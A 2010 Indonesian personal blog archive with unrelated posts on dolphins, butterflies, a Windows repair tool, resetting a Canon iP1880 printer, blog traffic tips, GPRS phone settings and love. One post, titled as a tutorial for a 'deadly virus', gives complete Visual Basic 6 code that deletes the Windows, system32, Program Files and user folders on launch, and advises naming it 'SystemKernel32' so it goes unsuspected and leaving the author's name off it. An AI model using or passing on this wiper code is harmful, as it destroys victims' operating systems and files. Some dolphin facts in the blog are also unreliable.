Selasa, 05 Oktober 2010

Lumba-lumba



Lumba-lumba adalah mamalia laut yang sangat cerdas, Tentu tidak asing lagi bagi kita ia merupakan icon persahabatan. Sosoknya yang ramah, lucu dan imut membuat manusia cepat akrab dan menyukai hewan yang satu ini.  Sistem alamiah yang melengkapi tubuhnya sangat  la kompleks.,
 


 FAKTA LUMBA-LUMBA
  • Suka menolong manusia yang kebetulan tersesat atau terombang ambing di tengah laut ( biasanya lumba lumba menolong dan membimbing menuju perairan).
  • Suka mengiringi kapal kapal yang berlayar di tengah lautan di sisi kiri kanan lambung kapal.
  • Lumba-lumba dapat mencapai kecepatan 60 km/jam nya atau 37 mph.
  • Selain itu Kedua sisi otak lumba-lumba bekerja secara terpisah. Selama 8 jam, kedua sisi otak itu sadar. Kemudian sisi yang kiri akan tidur selama 8 jam. Setelah sisi itu terbangun, sisi yang kanan akan tidur selama 8 jam. Dengan demikian lumba-lumba bisa tidur selama 8 jam tanpa harus berhenti secara fisik dan terus berenang.
  • Lumba lumba menggunaka suara untuk indera penglihatan nya, menggunakan suara untuk mencari kearah mana dia harus berenang mencari makan, yang unik saat lumba lumba mengeluarkan suara nya untuk mencari ikan ikan kecil makanan nya, maka ikan ikan kecil itu akan tidak berdaya.

TEKNOLOGI  YANG MENIRU LUMBA-LUMBA 
  • Baju Renang, terinspirasi dari kulit lumba-lumba yang mampu memperkecil gesekan dengan air, sehingga dapat berenang dengan sedikit hambatan air.
  • Radar Kapal Selam, terinspirasi dari sistem yang digunakan lumba-lumba untuk berkomunikasi dan menerima rangsang yang dinamakan sistem sonar, sistem ini dapat menghindari benda-benda yang ada di depan lumba-lumba, sehingga terhindar dari benturan.

Rabu, 29 September 2010

BUTTERFLY



Kupu-Kupu merupakan primadona di antara satwa avertebrata lainnya. Sayapnya yang indah dan menarik mampu memikat hati banyak orang. Susunan sisik serupa atap genteng pada sayap kupu-kupu memberi corak serta pola warna, dan ini merupakan dasar pemberian nama pada kelompok serangga ini, yaitu Lepidoptera. atau 'serangga bersayap sisik'.
Secara sederhana, kupu-kupu dibedakan dari ngengat alias kupu-kupu malam berdasarkan waktu aktifnya dan ciri-ciri fisiknya. Kupu-kupu umumnya aktif di waktu siang (diurnal), sedangkan gengat kebanyakan aktif di waktu malam (nocturnal). Kupu-kupu beristirahat atau hinggap dengan menegakkan sayapnya, ngengat hinggap dengan membentangkan sayapnya. Kupu-kupu biasanya memiliki warna yang indah cemerlang, ngengat cenderung gelap, kusam atau kelabu. Meski demikian, perbedaan-perbedaan ini selalu ada perkecualiannya, sehingga secara ilmiah tidak dapat dijadikan pegangan yang pasti. (van Mastrigt dan Rosariyanto, 2005).


Dari 20.000 jenis kupu-kupu di dunia, 2.500 jenis ada di Indonesia, 200 diantaranya merupakan kupu-kupu terindah didunia

Keadaan geografis Indonesia sangat mendukung kekayaan khazanah Flora dan Fauna Nusantara, dengan pengaruh elemen Asia di kawasan barat, elemen Australia di kawasan timur, dan pengaruh kedua elemen di kawasan Wallacea.
Sulawesi adalah pulau yang memiliki keunikan kupu-kupu tertinggi di Indonesia. Dari 557 jenis yang ada di sana, sebanyak 239 jenis (lebih dari 40 persen) merupakan jenis yang hanya dapat dijumpai di kawasan itu, contohnya Papilio blumei.
Kupu-kupu juga dijadikan simbol metamorfosis yang menakjubkan. Dalam perubahan fase kehidupan (telur-ulat-kepompong-kupu-kupu dewasa), sesungguhnya banyak satwa yang juga mengalami proses metamorfosis serupa, misalnya nyamuk, tawon, dan kumbang. Namun, karena keindahan wujud dewasanya yang sangat kontras dengan bentuk pradewasa, kupu-kupulah yang sering disorot. Dengan demikian, kupu-kupu sering menjadi sumber inspirasi dan motivasi bagi banyak orang.

Selasa, 06 Juli 2010

Cara Praktis Perbaiki Sistem Windows



Setelah beberapa waktu digunakan, mungkin ada keluhan pada sistem operasi Windows di komputer anda. Bisa karena terasa lebih lambat, atau mungkin juga adanya gangguan pada pengoperasian atau penggunaannya.

Masalah atau gangguan tersebut bisa disebabkan karena banyaknya program yang terinstal, atau mungkin juga gangguan virus yang walau pun sudah dibersihkan masih meninggalkan masalah dengan mematikan beberapa fungsi Windows.




Berikut ini adalah sebuah software tool aka utility simpel yang bersifat portabel (tidak perlu diinstal bisa langsung dijalankan) bernama FixWin dengan ukuran file sangat kecil (tak sampai 1 MB), tapi cukup powerful untuk memperbaiki banyak masalah di Windows, terutama di Windows Vista dan Windows 7.




Ada lebih kurang 50 item permasalahan di Windows yang bisa diperbaiki dengan aplikasi ini. Di antaranya perbaikan dan optimalisasi pada kategori Windows Explorer, koneksi network dan internet, Windows Media Player, System Tools, dan beberapa fitur perbaikan lainnya.


Program freeware ini juga bisa memperbaiki gangguan pada penggunaan OS Windows akibat dimatikannya beberapa fungsi Windows oleh virus, misalnya tidak bisa klik kanan, setting folder option yang non aktif, file/folder yang disembunyikan akibat virus/malware, atau juga Registry Editor, Task Manager dan Command Prompt yang tidak muncul, dan lain-lainnya.

Download Gratis FixWin 1.2 ukuran file 175 KB

Baca juga ini:
  1. [DOWNLOAD] Cara Mudah Install Windows dari USB Flash Disk
  2. [DOWNLOAD] Paragon HFS for Windows 7.5 dan ExtBrowser Full Version
  3. [DOWNLOAD] Safari Reader, Fitur Keren di Browser Safari 5 Final
  4. [DOWNLOAD] Microsoft .NET Framework 4.0 (Apa Itu .NET Framework?)
  5. [DOWNLOAD] Antivirus PCMAV 3.0.3 – Ragnarok + Update Build1 (Juni-Juli 2010)
  6. [DOWNLOAD] FixWin, Cara Praktis Perbaiki Sistem Windows

Online Live TV - Indonesia
Metro TV | tvOne | ANTVRCTI
SCTV | Trans TVGloba
l TV 

Minggu, 18 April 2010

RESET PRINTER CANNON IP 1880

Cara reset printer

Trik cepat mereset printer yang macet/mogok/error secara manual dan menggunakan software

Hal yang paling menyebalkan adalah pada saat kita sedang mencetak dokumen-dokumen penting,tiba tiba printer berhenti mencetak alias error…hal ini bisa disebabkan beberapa hal pertama yang harus kita lakukan adalah memeriksa kabel power apakah sudah tercolok/terpasang dengan benar.jika tidak ada masalah coba periksa apakah tintanya habis..jika masih tidak mau..jalan satu satunya kita harus mereset printer..tapi tahukah anda,biaya untuk mereset printer begitu mahal..sebenarnya ada sebuah cara untuk mereset printer tanpa perlu membawa ketempat service..dan ini bisa anda lakukan sendiri itung itung melakukan penghematan…

Ada 2 cara dalam melakukan reset printer

1.reset printer dengan cara manual

a.cabut kabel power yang mengubungkan printer dengan listrik
b.Tekan dan tahan tombol power(on/off) sekitar 5 detik kemudian pasang kembali kabel power printer ke listrik sambil terus menahan tombol power
c.lanjutkan dengan menekan tombol resume sebanyak 2 kali
d.lepaskan semua tombol..anda sudah bisa menggunakan printer kembali
=========================================
CARA RESET MANUAL PRINTER CANON IP1880

Printer jenis Ip1880 kalau sudah mencapai akumulasi cetakan tertentu maka printer akan mengalami blinking yaitu 4 x orange 1 hijau atau 8x orange dan 1x hijau, untuk mengatasinya anda bisa mereset sementara dengan menggunakan tombol power dan resume, untuk lebih detailnya silahkan ikuti cara berikut :
1. Cabut kabel power dari arus AC (listrik)
2. Tekan tombol power (tahan) kemudian colokan kabel power ke Listrik
3. Tekan tombol resume 2x (tekan pertama nyala lampu orange, kedua lampu indikator hijau)
4. Kemudian lepaskan, maka printer akan warming up kemudian ready.

Untuk reseter permanent gunakan reseter (general tools) ip1700 atau ip1800

Printer jenis Ip1880 kalau sudah mencapai akumulasi cetakan tertentu maka printer akan mengalami blinking yaitu 4 x orange 1 hijau atau 8x orange dan 1x hijau, untuk mengatasinya anda bisa mereset sementara dengan menggunakan tombol power dan resume, untuk lebih detailnya silahkan ikuti cara berikut :
1. Cabut kabel power dari arus AC (listrik)
2. Tekan tombol power (tahan) kemudian colokan kabel power ke Listrik
3. Tekan tombol resume 2x (tekan pertama nyala lampu orange, kedua lampu indikator hijau)
4. Kemudian lepaskan, maka printer akan warming up kemudian ready.

Untuk reseter permanent gunakan reseter (general tools) ip1700 atau ip1800

=====================
2.reset printer dengan sofware ressetor

a.pastikan anda tahu merek printer anda
b.download program resetor dengan mencari dengan searc engine.anda bisa menggunakan keyword berikut : Software resseter+canon IP1800+Download
c.bagi anda yang menggunakan printer Epson bisa mendownload di http://www.ssclg.com/epsone.shtml di situs ini terdapat hampir semua merek dan tipe Epson

Sebelum Mereset Printer, Anda harus mengerti betul masalah printer yang anda hadapi, jika salah mereset malah jadi rongsok..

Menaikan Retting Blog Anda

1. Submit Blog anda ke search engine. Banyak orang yang mayoritas trafficnya didapat dari search engine. Ketika orang mencari dengan keyword anda dan menemukan site anda, anda akan mendapatkan traffic! dan ingat untuk tetap menulis contain baru agar blog anda tetap memiliki peringkat di search engine.
2. Jalin kerjasama dengan blogger lain. Kembangkan kerja sama dengan semua blogger lain terutama yang blognya sejalan dengan blog anda. Berikan komentar pada blog mereka buat percakapan, link dengan mereka & jalin persahabatan. Dan sebelum anda mengetahui mereka akan mengelink blog anda yang tentunya akan mendatangkan traffic ke blog anda.
3. Gunakan Traffic Exchange. Saya kurang yakin anda akan terkena penalty dari adsense jika anda menggunakan traffic exchange. Traffic exchange akan membawa para pembaca yang loyal jika blog anda cukup baik disamping mendapatkan traffic yang berkelanjutan. Lihat posting mengenai BlogMad traffic exchange.

4. Link ke postingan anda yang lain sebanyak yang anda bisa. Link internally ke potingan dalam blog anda. Ini akan membantu ranking blog anda dan juga akan membantu traffic. Jika orang yang datang ke blog anda tidak ada pilihan lagi untuk dilihat maka mereka akan pergi. Ketika anda ngeling ke postingan anda yang lain meraka akan klik link anda dan akan tetap di blog anda lebih lama.
5. Sign up ke Yahoo! Answer. Di Yahoo Answer anda dapat menjawab pertanyaan orang lain & menolong orang lain. Disana ada box dimana anda dapat menuliskan sumber dari jawaban anda. Jawablah pertanyaan yang ada dan buat link ke blog anda sebagai sumber.
6. Sign up blog anda di top blog list. Blog top list adalah sebuah blog yang me listing semua blog yang menjadi member pada blog tersebut. Blog anda akan berada pada peringkat yang lebih tinggi jika memiliki lebih banyak traffic, lebih
banyak vote & lebih banyak visitor. Cara joinnya sangat simple, plus cara ini akan dapat menambah traffic.

7. Submit ke site directory. Beberapa directory melisting ratusan site, & beberapa ribuan. Blacklink dari directory adalah baik, tapi traffic dari directory hanya sebuah tric kecil, bahkan hampir tidak ada hasil. Walaupun demikian submit dengan nama site anda menggunakan keyword anda akan dapat ranking yang lebih tinngi di Google untuk keyword tersebut, yang akan berarti traffic yang lebih banyak.
8. Posting ke Facebook. Jika anda sudah memposting postingan yang anda buat di blog, coba posting juga ke akun Facebook/Twitter anda. Disana para friendlist anda mungkin tertarik pada postingan anda dan akan menambah traffic blog anda juga.

9. Baca ulang, edit dan lanjutkan posting artikel anda. Tidak ada yang akan mau me link sebuah posting yang tidak berkualitas, walaupun potingan itu sebuah ide yang brilian jika penuh dengan ejaan dan gramatikal yang salah. Tidak ada yang melink berarti tidak ada traffic.
10. Submit postingan anda ke Blog carnival. Kunjungi Blog Carnival website dan submit sebanyak-banyaknya artikel anda ke carnival yang berhubungan dengan niche anda. Ketika artikel edisi carnival yang anda submit diposting, tidak hanyaanda akan dapat linkback, tetapi anda akan mendapatkan visitor yang lebih banyak ke blog anda.

11. Pertahankan blog carnival anda. Menurut saya blog carnival sangat menyenangkan untuk dipertahankan. Orang akan submit artikel mereka ke carnival anda, & hampir semua orang2 ini akan mengunjungi edisi carnival anda untuk melihat link mereka disana. Dan carnival anda dapat juga menjadi yang utama & tampil di homepage website Blog Carnival.
12. Tukar Link dengan site lain dilingkungan anda. Di manapun tukar link dibuat, entah itu di sidebar pada setiap halaman site, di dalam halaman site tersebut, ataupun di postingan itu terserah anda. Tukar Link dengan orang lain yang
memiliki blog yang berhubungan akan banyak membantu. Dan ketika site mereka menjadi besar maka akan lebih banyak membantu.
13. Gunakan Feedburner untuk orang subscribe to blog anda. Ketika seseorang subscribe blog anda via RSS atau mendapatkan update blog anda via email, mereka akan melihat postingan anda ketika ada yang baru. Hal ini akan menjadi vital untuk menjaga para pembaca tetap berhubungan dengan blog anda & menarik mereka kembali.
14. Gunakan Youtube. Buat account di youtube, dan kemudian pada profile anda anda akan dapat melist alamat2 website anda. List alamat blog anda disana & mulailah buat video. Ketika seseorang melihat profile anda kemungkinan ia akan mengklik blog anda.
15. Mintalah blog yang lebih besar untuk sebuah link. Bangunlan relation ship yang baik sebelum anda meminta sesuatu. Pastikan anda melink mereka dulu dipostingan anda. .
16. Gunakan Techorati tags. Mendapatkan lebih banyak category pada Techorati berarti anda akan mendapatkan lebih banyak expose, yang berarti mendapatkan lebih banyak traffic. Jika anda ingin mengetahui lebih banyak tentang Techorati silahkan kunjungi Court’s post.

17. Tulislah mengenai celebrity. Tidak perduli tentang apa blog anda, anda akan dapat cara untuk menyesuaikan dengan topik blog anda tentang celebriti. Orang akan mencari info tentang celebriti setiap waktu dan menyukai gossip tentang mereka. Lipatgandakan traffic anda ketika anda mendapatkan sebuah gosip tentang celebriti setelah sesuatu yang terjadi
pada celebriti tersebut. Sebagai contoh, misalnya tentang pencukuran rambut mereka,hari ulang tahun anak mereka, perkawinan mereka atau tentang kematian mereka.
18. Menganjurkan pembaca untuk meng”Digg” artikel anda. Digg adalah sebuah site yang mengumpulkan vote pada artikel. Dengan kata lain pembaca suka atau tidak artikel tersebut. Teman blogger anda akan dengan suka rela meng”Digg” artikel anda jika anda memintanya dengan sopan, atau lebih baik tambahkan tombol Digg pada bagian bawah semua postingan anda. Pastikan artikel-artikel terbaik anda mendapatkan Digg & jika postingan tersebut cukup baik maka akan mendapatkan ribuan visitor tiap hari.

19. Dapatkan “plugin” ke social bookmarking site. Pada setiap artikel blog sering didapati barisan tombol yang mempersilahkan para pembaca untuk submit dan vote artikel ke social bookmarking site (Digg, Reddit, Netscape, atau yang lainnya). Saya sendiri menggunakan AntiSocial plugin. Jika anda anda mengimplementasikan plugin ini artikel anda akan tersubmit ke social bookmarking site yang berarti traffic yang lebih banyak.
20. Link ke “A-listers”. Teknik ini digunakan untuk meminta A-lister untuk sebuah link atau membujuk mereka untuk memberikan sebuah link kepada anda. Makin banyak anda melink ke A-listers dan probloggers makin banyak kemungkinan mereka mengenal anda, lalu mungkin mereka akan melink ke artikel anda yang akan memberikan banyak traffic ke blog anda.
21. Tulislah sebuah post pilar. Pilar post tidak hanya merupakan list post. Pilar post merupaka inti dari blog anda. Potingan ini biasanya panjang, authoritative, & instructional. Pilar post membutuhkan waktu yang lama untuk menulisnya. Anda harus melink ke pilar post sebanyak mungkin dalam blog anda & pastikan pilar post mendapatkan perhatian terbanyak. Pilar post akan mendapatkan banyak link & mendatangkan banyak traffic.
22. Ketika masa perayaan tiba, tulislah tentang hal itu. Ketika Easter, Lebaran, Thanksgiving, Chrismas, atau hari-hari libur/perayaan lain tiba, buatlah post tentang hal itu sebulan sebelumnya. Pastikan postingan anda terindex & dilink. Ketika harinya tiba, kemungkinan akan dicari oleh banyak orang & blog kamu mungkin akan ditemukan.

23. Gunakan smart URLs di WordPress. Jika anda menggunakan wordpress dan menggunakan messy URL mereka, anda sebaiknya gunakan plugin ini untuk menukar URL termasuk tanggal dan nama post di link. menggunakan plugin tersebut tidak akan menghilangkan statistic search engine anda atau yang lainnya.
24. Buat pengunjung blog anda merasa seperti dirumah. Jika anda seseorang yang tidak sopan, jangan pernah memberikan apapun kepada pembaca blog anda, jangan menjawab komentar atau email, jangan menolong blogger lain, atau selalu sinis dan tidak membuat para pembaca blog anda merasa seperti dirumah mereka sendiri, maka besar kemungkinan mereka akan berhenti untuk mengunjungi blog anda. Tapi jika anda membuat mereka seperti dirumah sendiri anda akan mendapatkan banyak traffic.

25. Jadilah manusia, bukan robot. Jika di dalam semua poting anda selalu hanya meneriakkan business secara extrim, misalnya tidak menampilkan diri anda, hanya berbicara tentang hal yang sama setiap waktu, atau 100 % sempurna, hal itu kan membuat mereka menjauh. Saya tidak bermaksud mangatakan anda untuk selalu sopan, berbicara tentang diri anda setiap waktu, melenceng dari topic anda, atau berbuat banyak kesalahan. Tetapi biarkan para pembaca anda tahu bahwa anda juga seperti mereka, bahwa anda juga manusia biasa. Jangan buat blog anda membosankan.

26. Keluarkan iklan dari blog anda. Untuk meningkatkan traffic hilangkanlah iklan anda. Ketika anda tidak ada jalan untuk mendapatkan uang dari blog anda, anda akan merasa sayang, tapi yakinlah bahwa anda akan mendapatkan traffic dan pembaca yang loyal jika blog anda memang berkualitas. Dan jika sudah memungkinkan anda bisa memasangnya lagi untuk memulai meraup uang.
27. Mulailah membuat blog directory anda sendiri. Buatlah blog directory, misalnya di miserably. Ketika anda buat directory pertama kali, buatlah semua link dengan gratis dan dapatkan sebuah link submit form, dimana submission akan mengirimkan anda email. Anda dapat melakukannya mingguan/harian tergantung link yang dikirimkan kepada anda, atau anda dapat assign linknya ke “proper Categoies” yang disediakan. Ketika blog anda sudah menjadi besar, anda dapat mengajukan pemintaan “reciprocal link” & akan mendapatkan “featured site table” yang ngelink ke blog anda.
28. Post tentang A-listers. Misalnya tentang blogger Darren Rowse dan John Chow. Anda dapat menulis tentang mereka sebagai personal atau sebagai blogger, atau anda dapat menulis tentang bagaimana mereka melakukan sesuatu. Anda dapat mempost pikiran anda tentang yang mereka katakan atau mengembangkan postingan mereka dan kemudian tinggalkan pesan dipostingan mereka bahwa anda juga sudah melakukan hal yang sama.
29. Interview blogger lain. Interview blogger lain biasanya akan memberikan beberapa posting & links. Link berarti traffic.
30. Buatlah postingan link yang digemari.

31. Buatlah kontes berhadiah. Ini adalah ide yang baik. Buatlah kontes dengan hadiah yang menarik. Orang orang akan mengikuti blog anda dengan harapan akan memenangkan hadiah. Jika anda memberikan hadiah yang menarik beritanga pasti akan tersebar, tapi sebelumnya pastikan dulu bahwa bahwa blog anda memiliki banyak pembaca yang setia.
32. Berpura-puralah menjual blog anda. Ini adalah salah satu cara untuk mendapatkan traffic, tapi saya tidak merekomendasikannya. Anda dapat membayar beberapa dolar untuk melist blog anda di marketplace & dapatkan traffic dari para pembeli potensial. Lalu batalkan penawaran dan keep blog anda. Tidak akan ada dari traffic anda yang akan kembali. Ini bukan targetnya dan hanya akan membuang uang. Tetapi jika anda ingin hanya mendapatkan traffic sesaat cara ini boleh dicoba.
33. Jadilah comedian. Buatlah pengunjung tertawa. Ini susah susah gampang. Jika anda dapat membuat pengunjung anda tertawa dan senang mereka akan mengingat blog anda & akan memberitahukan yang lain tentang blog anda & akan kembali lagi.

34. Tolonglah blogger yang membutuhkan anda. Jika ada blogger pemula yang meninggalkan anda komentar atau email bantulah mereka. Siapa tau suatu saat mereka akan menjadi besar & akan selalu mengingat kebaikan anda.
35. Buatlah poll pada blog anda. Orang-orang menyukai voting & selalu ingin melihat hasil dari sebuah polling. Polling itu popular & popular akan mendatangkan traffic.
36. Buatlah blog baru. Jika anda masih dapat menanganinya dengan baik buatlah blog baru, baik itu di hosingan gratis atau domain anda sendiri. Apapun yang anda inginkan usahakan traffic untuk setiap blog yang anda miliki, & pastikan semua blog anda ngelink terhadap yang lainnya, terutama blog yang kecil harus di link oleh blog yang lebih besar. Diharapkan siapapun yang membaca salah satu blog anda dapat diperkenalkan blog anda yang lain.
37. Buat atau hack plugin wordpress. Oke, ini hanya untuk yang pitar “nge-hack” atau membuat plugin wordpress. Saya belum pernah melakukannya. Tapi jika anda bisa, anda akan mendapatkan banyak link & traffic dari semua yang menggunakan plugin anda.

38. Buatlah blog theme (wordpress, blogspot, atau apapun). Sama halnya seperti membuat sebuah plugin, traffic akan datang seiring dengan link. Bahkan membuat blog theme lebih mudah dari membuat plugin atau belajar seo.
39. Buatlah gambar yang dapat digunakan oleh orang lain. Jika anda membuat gambar yang gratis, yang dapat digunakan orang lain untuk blog mereka, anda akan mendapatkan traffic dari sini. Dan jika anda professional dalam membuat gambar, anda bisa mendapatkan tambahan uang dari sini.
40. Buatlah gambar untuk site social networking. Orang yang menggunakan Myspace, facebook, dan semua site tipe ini menyukai menggunakan gambar. Banner berwarna, gambar animasi, gambar berkedip, jika membuat ini maka mereka akan
menggunakannya, Tempatkan link anda disana.
41. Gabung di Myspace dan dapatkan banyak teman. Bergabunglah di Myspace klicklah “browse” dan add people. Jika anda sudah mendapatkan banyak teman buatlah link ke blog anda pada bulletin dan di profile anda atau dimana saja yang anda bisa. Ini akan mendapatkan traffic jika anda melakukannya dengan benar.
42. Jawablah pertanyaan yang anda dapatkan dari komentar ataupun email dengan sebuah post. Jika seseorang memberikan komentar atau pertanyaan dan jawabannya cukup panjang, Jangan buang waktu anda jawablah dengan link ke potingan anda. Jika postingan mengenai hal itu belum ada, buatlah sebuah postingan mengenai hal itu.
43. Kerjakan Search Engine Optimization. Semakin baik rangking anda di search engine maka akan semakin banyak visitor yang akan mereka kirimkan.

44. Buatlan sebuah serial award/penghargaan. Luangkan waktu anda untuk membuat sebuah trophy atau banner untuk sebuah award atau penghargaan. Pastikan award itu memiliki tema atau nama, misalnya, “Tropy Penghargaan Untuk Blogger Terbaik”. Lalu linkkan banner tersebut ke 5 blogger lain yang menurut anda terbaik. Buat peraturan bahwa kelima blogger tersebut juga melakukan hal yang sama dengan banner tersebut, link dengan lima blogger lain yang menurut mereka terbaik. Pastikan di dalam banner tersebut terdapat link anda sebagai pembuat banner. Jika ini berjalan maka akan ada banyak linkback kepada blog anda & anda akan menerima banyak traffic.
45. Order review melalui ReviewMe. Jika anda order review pada blog lain dengan ReviewMe atau PayPerPost orang banyak akan membaca tentang blog anda. Review adalah cara terbaik anda mengiklankan blog anda untuk mendapatkan pembaca yang setia.

46. Pasang iklan di Google Adwords. Jika anda ada uang lebih tidak ada salahnya anda membeli iklan di Google Adwords. Mereka yang tertarik akan mengklik iklan anda. Sebagian dari mereka akan menjadi pembaca yang setia dan mungin sebagian lagi tidak. Ini adalah jalan yang baik untuk mendapatkan traffic.
45. Gunakan ReviewBack untuk mendapatkan review gratis. Anda akan mendapatkan review gratis disini, berguna untuk mendapatkan traffic. Check di ReviewBack.
46. Tulislah sebuah Press Release. Klik disini untuk mengetahui bagainama caranya.
47. Dapatkan favorit list di Techorati. Tachorati top 100 favorited list direview di sini. Akan sangat sulit untuk mendapatkannya, anda memerlukan beberapa ratus favorite atau bahkan beberapa ribu jika anda menginginkan berada ditempat teratas list. Tapi ini akan menghasilkan banyak sekali traffic jika anda berhasil melakukannya.
48. Join forum dan & message board. Bergabunglah dengan forum dan message board yang relevan dengan tema blog anda. Jika diizinkan link blog anda dimana yang anda bisa. Orang yang melihatnya akan senang untuk mengecheck blog anda.
49. Tambahkan link blog anda di forum signature. Ide lain, tapi tetap hanya jika diizinkan. Tambahkan link anda di forum signature dan aktiflah berkomunikasi. Link anda akan terlihat di setiap posting anda. Anda akan mendapatkan traffic yang lumayan jika forum banyak membernya.
50. Tulis sebuah post dengan title yang menarik, gampang diingat & mengandung keyword. Postingan dengan title yang menarik & gampang diingat biasanya akan mendapatkan traffic yang lebih banyak, apalagi jika mengandung keyword. Anda akan mendapatkan rangking di search engine, dan jika seseorang melink artikel anda dengan keywords tersebut anda akan mendapatkan rangking yang lebih baik dan akan mendapatkan traffic lebih dari google, yahoo, atau yang lainnya.

51. Gunakan gambar pada postingan anda. Jika postingan hanya berupa text postigan akan menjadi cepat membosankan. Gambar juga berguna untuk SEO jika seseorang mencari gambar di search engine. Tapi saya merekomendasikan hanya menggunakan 1 gambar per posting, agar tidak terjadi kesimpangsiuran pada search engine.
52. Tulislah sebuah review. Jika anda membuat sebuah review yang baik terhadap suatu product, hal itu akan menjadi perhatian dari orang orang yang tertarik terhadap product tersebut. Buatlah review terhadap sebuah product yang lagi digandrungi saat ini.
53. Buat tulisan yang lebih berkualitas. Jika artikel-artikel anda ada yang di Digg atau StumbleUpon oleh para pembaca blog anda, postinglah artikel yang lebih menarik dan lebih berkualitas. Biarkan pengunjung blog anda tau bahwa blog anda adalah blog yang berkualitas dan mereka akan datang kembali.
54 Post tentang event-event penting yang berhubungan dengan blog anda. Jika sesuatu event penting yang sesuai dengan tema blog anda akan datang, tulislah mengenai hal itu sebulan sebelum event itu tiba, berikan kesempatan search engine untuk mengindext artikel anda. Dan jika event itu tiba anda akan dapat traffic dari orang-orang yang mencari artikel tentang event tersebut.
56. Berbagilah rahasia anda dengan pembaca blog anda. Baik itu rahasia sukses bisnis anda, rahasia belajar seo ataupun rahasia hidup anda orang pasti akan senang mengetahuinya dan tidak akan menjadi antipati terhadap anda.
57. Jadilah lain dari yang lain. Bangunlah citra dan lakukan sesuatu yang berbeda yang orang lain belum pernah melakukannya. Anda akan mendapatkan ucapan terima kasih karena pembaca anda mendapatkan sesuatu yang baru. Nama anda akan diingat dalam waktu yang lama, tapi bukan selamanya. Muncullah dengan konsep baru yang orang lain belum pernah melakukannya.
58. Teruslah kembangkan blog anda. Para pembaca anda akan kembali lagi pada blog anda jika blog anda terus berkembang secara konstan. Usahakan menulis setiap hari, terutama menulis tentang topik belajar seo

Buat virus yang mematikan

Gwe bikin nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple bgt
Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.
Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri

Setting Manual GPRS Three 3

Setting Manual GPRS Three 3
Pilih Pengaturan > pilih Konfigurasi > pilih Pengaturan Konfigurasi Pribadi , tekan Pilihan > sorot Web (jika belum ada pengaturan sama sekali, jika sudah ada pengaturan, tekan Pilihan> pilih Tambah baru> sorot Web), isikan pada:
Nama account: tuliskan saja sebagai contoh Web Three 3

Situs: http://wap.three.co.id
Nama pengguna: 3gprs
Sandi: 3gprs

Verifikasi Sandi=3gprs
Gunakan jalur akses pilihan: Tidak (agar bisa setting Pengaturan jalur akses)
Pengaturan Jalur akses
Proxy: pilih Aktif
Alamat proxy: 10.4.0.10
Port Proxy: 3128

Pengaturan media
Jalur akses paket data: tulisan “internet” yang ada hapus ganti dengan 3gprs
Nama Pengguna: 3gprs
Sandi: 3gprs
Verifikasi Sandi=3gprs

abaikan settingan lain yang telah ada, tekan 3X tombol Kembali, pada menu Acct-acct pribadi, sorot Web Three 3>tekan tombol Pilihan>pilih Aktifkan
Setting Jalur Akses
Pilih Pengaturan > pilih Konfigurasi > pilih Pengaturan Konfigurasi Pribadi , tekan Pilihan > pilih Jalur Akses (jika belum ada pengaturan sama sekali, jika sudah ada pengaturan, tekan Pilihan> pilih Tambah baru> pilih Jalur Akses), isikan pada:
Nama Account: Jalur Akses Saya, hapus dan ganti dengan misal Three 3 (Agar mudah membedakan)
Pengaturan Media
Jalur Akses Paket Data: Internet, hapus dan ganti dengan 3gprs

Nama Pengguna:3gprs
Sandi: 3gprs

Verifikasi Sandi=3gprs
Abaikan pengaturan lain, lalu keluarlah dari pengaturan ini dengan menekan Kembali dipojok kanan bawah handphone, setelah sampai ke menu Acct-acct pribadi, tekan Pilihan, pilih Three 3Aktifkan.
Setting Manual MMS Three 3 Nokia 3100c
Pengaturan>Konfigurasi>Pengaturan konfigurasi pribadi>bila baru pertama membuat settingan langsung pilih jenis aplikasi Pesan m media, bila sudah settting lain, tekan Pilihan>Tambah baru, Pesan m media, isikan:
Nama account: tuliskan saja MMS-Three 3
Alamat server: http://mms.three.co.id
Gunakan titik akses: Tidak

Pengaturan jalur akses
Proxy: pilih Aktif
Alamat proxy: 10.4.0.10
Port Proxy= 3128

Pengaturan media
Jalur akses paket data: 3mms
Jenis jaringan : IPV4 (biarkan)
Jenis keaslian: Normal (biarkan)
Nama pengguna: 3mms
Sandi: 3mms
Verifikasi sandi: 3mms

tekan 3X Kembali, sorot MMS-Three 3 tekan Pilihan>Aktifkan

Belajar Jadi Hacker

Kali saya akan memberikan sebuah teric bagaimana untuk menjadi hacker yang handal.
Silakan download totorialnya di sini.

Cinta

Disaat seseorang sedang dilanda asamara dunia ini akan terasa sempit. Semua akan dilakukan dengan penuh gairah. Demi cinta apapun akan dilakuakan. Berabagai cara akan di lakuakan untuk menaklukan sang pujaan hati. Semua tentang sangpujaan akan terliahat baik, tiadak ada satupun hal buruk tentang pujaan hati. Demi cinta rela mengorabnkan waktu, n teman. Kamu mengalihkan dunia q.

Kamis, 14 Januari 2010

